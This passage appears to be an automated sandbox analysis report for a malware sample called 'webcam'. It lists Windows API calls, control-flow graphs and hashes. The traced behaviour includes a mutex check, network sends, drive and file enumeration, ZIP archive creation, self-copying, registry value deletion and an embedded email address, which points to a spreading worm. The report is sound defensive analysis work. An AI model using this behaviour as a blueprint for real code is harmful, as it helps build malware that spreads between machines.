                                                                                                                                                                                                              • Part of subcall function 00401A6D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,0041A051), ref: 00401A81
                                                                                                                                                                                                              • Part of subcall function 00401A6D: ReadFile.KERNELBASE(00000000,?,00000400,0000001E,00000000), ref: 00401AA8
                                                                                                                                                                                                              • Part of subcall function 00401A6D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00401AE6
                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 00401891
                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040189D
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,04034B50,0000001E,?,00000000), ref: 004018D5
                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,004022FE,00000000), ref: 004018E8
                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 004018FB
                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,?,00000400,?,00000000), ref: 00401918
                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00401939
                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,0000002E,?,00000000), ref: 0040196F
                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,004022FE,00000000), ref: 00401982
                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,06054B50,00000016,?,00000000), ref: 004019C3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Write$Pointer$CreateReadSize$SystemTime
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 220895958-3916222277
                                                                                                                                                                                                            • Opcode ID: aab24eb8617f8d725d7d8e24e7180a7e7e8e5969de52de2914c22b74f2718137
                                                                                                                                                                                                            • Instruction ID: b2c603c1d1320f768cb9f7d01f3a84518a27657aa67346375d6e3d71cd624553
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aab24eb8617f8d725d7d8e24e7180a7e7e8e5969de52de2914c22b74f2718137
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6071267590121CBADF11DFA1CC84EDFBBB9FF08350F10412AF914AA2A0D7359A54CBA8
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 431 4030f9-403132 GetTickCount call 401d91 CreateMutexA GetLastError 434 403134-40313a 431->434 435 40313d-4031b8 WSAStartup call 402ea0 call 403720 call 4032d8 call 403630 CreateThread * 2 431->435 444 4031ba-4031d4 Sleep InternetGetConnectedState 435->444 444->444 445 4031d6-4031de 444->445 445->444 446 4031e0 445->446 447 4031e7-4031ea 446->447 447->444 448 4031ec-4031f2 447->448 449 4031f4 448->449 450 40324a-40326a InternetGetConnectedState Sleep 448->450 451 4031f7-403214 GetExitCodeThread 449->451 450->447 452 403270 450->452 453 403216-403218 451->453 454 40321a-40323a CreateThread 451->454 452->444 453->454 455 403241-403248 453->455 454->455 455->450 455->451
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403105
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 0040311C
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00403127
                                                                                                                                                                                                            • WSAStartup.WS2_32(00000101,?), ref: 00403149
                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00002E37,00000000,00000000,?), ref: 004031A9
                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00003085,00000000,00000000,?), ref: 004031B8
                                                                                                                                                                                                            • Sleep.KERNELBASE(00000032), ref: 004031BC
                                                                                                                                                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004031CA
                                                                                                                                                                                                            • GetExitCodeThread.KERNELBASE(00000000,?), ref: 00403207
                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00001E62,0040DDC0,00000000,?), ref: 0040322B
                                                                                                                                                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 0040324F
                                                                                                                                                                                                            • Sleep.KERNELBASE(00000032), ref: 00403259
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateThread$ConnectedInternetSleepState$CodeCountErrorExitLastMutexStartupTick
                                                                                                                                                                                                            • String ID: jfkoofia@yahoo.com
                                                                                                                                                                                                            • API String ID: 1202457691-1009674638
                                                                                                                                                                                                            • Opcode ID: 4db236c8f64a66a94e666b966866f959043465874e8551258ceb0bafea335d50
                                                                                                                                                                                                            • Instruction ID: a1bf2ff7ef5bceeac63f91e3b4f6e5b3c95491823722eaf96483bc5270944901
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4db236c8f64a66a94e666b966866f959043465874e8551258ceb0bafea335d50
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3418DB1940209AFEB00DFA0DD889AF7BBCEB08349F10447AF546F3291D7785E558B69
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 546 40156c-4015b3 GlobalAlloc GetNetworkParams 547 4015c5-4015d1 GetNetworkParams 546->547 548 4015b5-4015c3 GlobalAlloc 546->548 549 4015d3-4015e8 call 4010a4 547->549 550 401624 547->550 548->547 555 4015ed-4015f4 549->555 551 401627 550->551 554 40162e-40164d call 4010a4 551->554 561 401661-401663 554->561 563 40164f-40165a 554->563 556 4015f6 555->556 557 40165e 555->557 559 4015fc-4015fe 556->559 557->561 559->551 562 401600-40161e call 4010a4 559->562 564 401665 561->564 565 40166c-40166e 561->565 562->561 573 401620-401622 562->573 563->554 569 40165c 563->569 564->565 566 401670 565->566 567 401677-40167c 565->567 566->567 571 40168d-401690 567->571 572 40167e-401685 call 401335 567->572 569->561 575 40168a-40168c 572->575 573->559
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000248,00000000,0041A04C,?), ref: 0040159F
                                                                                                                                                                                                            • GetNetworkParams.IPHLPAPI(00000000,?), ref: 004015AB
                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004015C1
                                                                                                                                                                                                            • GetNetworkParams.IPHLPAPI(00000000,?), ref: 004015CA
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocGlobalNetworkParams
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3514119424-0
                                                                                                                                                                                                            • Opcode ID: b6989ceaf6a03dd3dd631485981c7ef7645e8d2b24465e3c30eabdb139561af4
                                                                                                                                                                                                            • Instruction ID: c581374ef95c225fa66d458b5d7b2084ae11338eb7f1df88d1f5ced31a198c6c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6989ceaf6a03dd3dd631485981c7ef7645e8d2b24465e3c30eabdb139561af4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A31E676900214ABDB11DBA0CC45FDA77ECAF40750F0940B6EA45F72A1DB799E848B98
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 576 401cb2-401cc4 577 401cc5-401cc7 576->577 578 401cca-401cdf _hread 577->578 579 401ce1-401ce4 578->579 580 401ce6 578->580 581 401ce9-401ced 579->581 580->581 581->578 582 401cef-401cf4 581->582 583 401cf6-401d09 call 401af4 582->583 584 401d2a-401d36 582->584 595 401d0b-401d1a send 583->595 586 401d38-401d3b 584->586 587 401d3f-401d42 584->587 586->577 588 401d3d 586->588 589 401d44-401d53 send 587->589 590 401d5a-401d60 587->590 588->587 592 401d55-401d58 589->592 593 401d6e-401d71 589->593 590->577 594 401d66-401d68 590->594 592->590 592->593 596 401d69-401d6d 593->596 594->596 595->593 597 401d1c-401d1f 595->597 597->593 598 401d21-401d25 597->598 598->595 599 401d27 598->599 599->584
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _hread.KERNEL32(00000000,00000048,00000001), ref: 00401CD4
                                                                                                                                                                                                            • send.WS2_32(00000000,?,00000001,00000000), ref: 00401D16
                                                                                                                                                                                                            • send.WS2_32(00000000,0040AB98,00000002,00000000), ref: 00401D4F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: send$_hread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 770882311-0
                                                                                                                                                                                                            • Opcode ID: 9568b479f45dfe81c6e836dc9d064f14b8b6d94a03e0000c5ae6400c2a12506e
                                                                                                                                                                                                            • Instruction ID: 4473fe92f90581cfab6e991a706c643bebd06036b7b4de64e9f910bb31183d2b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9568b479f45dfe81c6e836dc9d064f14b8b6d94a03e0000c5ae6400c2a12506e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E21B676E00218AADF219BA5CC84AEFB7B9FF40725F20423BE525F21E0D3759A41CB54
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 600 401a6d-401aa5 SetFilePointer 601 401aa8-401aac ReadFile 600->601 602 401ae0-401af3 SetFilePointer 601->602 603 401aae-401ab1 601->603 603->602 604 401ab3-401ade call 401691 603->604 604->601
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,0041A051), ref: 00401A81
                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,?,00000400,0000001E,00000000), ref: 00401AA8
                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00401AE6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Pointer$Read
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2010065189-0
                                                                                                                                                                                                            • Opcode ID: e81b818a9960a86f8ab5b2329bdd6e1202786cb99db1b9c1e44af20c7a116313
                                                                                                                                                                                                            • Instruction ID: 2da40f7e4de96e1f52dca9c8c0568d948c402fee187df06ded76a7700b51998a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e81b818a9960a86f8ab5b2329bdd6e1202786cb99db1b9c1e44af20c7a116313
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 731103B5901028BBDB219F91CD48CDFBF7CEF453A4F1040A6BA09A2120D6359A56DBA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 607 4050d4-4050e5 608 405117-40513b RtlAllocateHeap 607->608 609 4050e7-405104 607->609 610 405167-405169 608->610 611 40513d-405155 VirtualAlloc 608->611 609->610 616 405106-405112 609->616 614 405182-405184 610->614 612 405157-405161 HeapFree 611->612 613 40516b-405180 611->613 612->610 613->614 616->608
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,000041C4,00000013), ref: 00405130
                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,?), ref: 0040514A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 00405161
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocAllocateFreeVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1702295773-0
                                                                                                                                                                                                            • Opcode ID: 85fe7fa33a580cbed554531df588a258a414acce59b53c0c872e434cf99fc004
                                                                                                                                                                                                            • Instruction ID: e0ef3e5d47e0e8a7737a84c02c4b327dd222423e0ed1cb0d0df2e217ac6451dd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85fe7fa33a580cbed554531df588a258a414acce59b53c0c872e434cf99fc004
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D113A34601A00AFC7228F19EC45AA77BB6FB857607108A7DE166DB1F1CB719851CF1C
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 617 402e37-402e47 GetCurrentThread SetThreadPriority 618 402e4c-402e57 GetDriveTypeA 617->618 619 402e61-402e6a 618->619 620 402e59-402e5b call 402cea 618->620 619->618 622 402e6c-402e6f 619->622 623 402e60 620->623 623->619
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 00402E3A
                                                                                                                                                                                                            • SetThreadPriority.KERNELBASE(00000000), ref: 00402E41
                                                                                                                                                                                                            • GetDriveTypeA.KERNELBASE(00408890), ref: 00402E4E
                                                                                                                                                                                                              • Part of subcall function 00402CEA: FindFirstFileA.KERNELBASE(?,?,?,?,?,00408890), ref: 00402D25
                                                                                                                                                                                                              • Part of subcall function 00402CEA: CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,?,?,?,00408890), ref: 00402DBD
                                                                                                                                                                                                              • Part of subcall function 00402CEA: FindNextFileA.KERNELBASE(00000000,00000010,?,?,?,?,?,?,?,?,?,?,00408890), ref: 00402E1F
                                                                                                                                                                                                              • Part of subcall function 00402CEA: FindClose.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,00408890), ref: 00402E2E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$FileThread$BuffCharCloseCurrentDriveFirstLowerNextPriorityType
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1999482922-0
                                                                                                                                                                                                            • Opcode ID: d359eda30bd99ca2578c6909916dfbc08d0e588617aa7c448a226afa4219755d
                                                                                                                                                                                                            • Instruction ID: 8cd0d0fb09a5a5791e36263293d59010951bc12952289bb9296594470fb44683
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d359eda30bd99ca2578c6909916dfbc08d0e588617aa7c448a226afa4219755d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07D012338445109BEB516B74EE4C84A7A60AB01370366853BF89BF11F5CA3A4C50869C
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00402E7F
                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(?,?), ref: 00402E8F
                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00402E98
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 849931509-0
                                                                                                                                                                                                            • Opcode ID: 3b985ecdd61c1c89794105ca6529a412aece386b509cd62460330d0951179110
                                                                                                                                                                                                            • Instruction ID: 1436ff2723aeba4cc04e22aeec036778132b69948e9ecde5d523fc4d6487a0d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b985ecdd61c1c89794105ca6529a412aece386b509cd62460330d0951179110
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DD0423614010CFBEF019F90EE0889A7B6AFB04215B01C121FA1EA4030D7329A209B58
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00402CD6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                            • String ID: -@
                                                                                                                                                                                                            • API String ID: 1304948518-2999422947
                                                                                                                                                                                                            • Opcode ID: b0f22df91630fefda9ee2f27dd11d90a23badb2b96bd2b4392767755468bc6c4
                                                                                                                                                                                                            • Instruction ID: 0ab4f68e2b3d47de9f352ec209093b6dbe49d88b4694b0089f9e1c04f9ec070a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0f22df91630fefda9ee2f27dd11d90a23badb2b96bd2b4392767755468bc6c4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB0148F6C002286ADF20EB55DC09FD9776CBB00309F1444BBA749B61D1DA799A494F5C
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00403B63,00000000), ref: 00404694
                                                                                                                                                                                                              • Part of subcall function 00404A37: RtlAllocateHeap.NTDLL(00000000,00000140,004046A8), ref: 00404A44
                                                                                                                                                                                                            • HeapDestroy.KERNEL32 ref: 004046B2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111775357.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112021400.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.4112081756.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_webcam.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateCreateDestroy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 316229882-0
                                                                                                                                                                                                            • Opcode ID: b529439db7e07ea534753e5dd505f7efad80a7dff303fa21c44e8ba2b60a4040
                                                                                                                                                                                                            • Instruction ID: 9ddc651c384a72fcc8bbbb9fb6b64fc80d3b8357a1baf8a30aa09fcb334ba20b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b529439db7e07ea534753e5dd505f7efad80a7dff303fa21c44e8ba2b60a4040
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDE05BB4361301AAEB115B349D49BBA3AD4AB85792F01C87AF905D51E0FB7DC490991C
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?,00402769,?), ref: 0040379F
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004037A9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111775357.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.4111713500.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
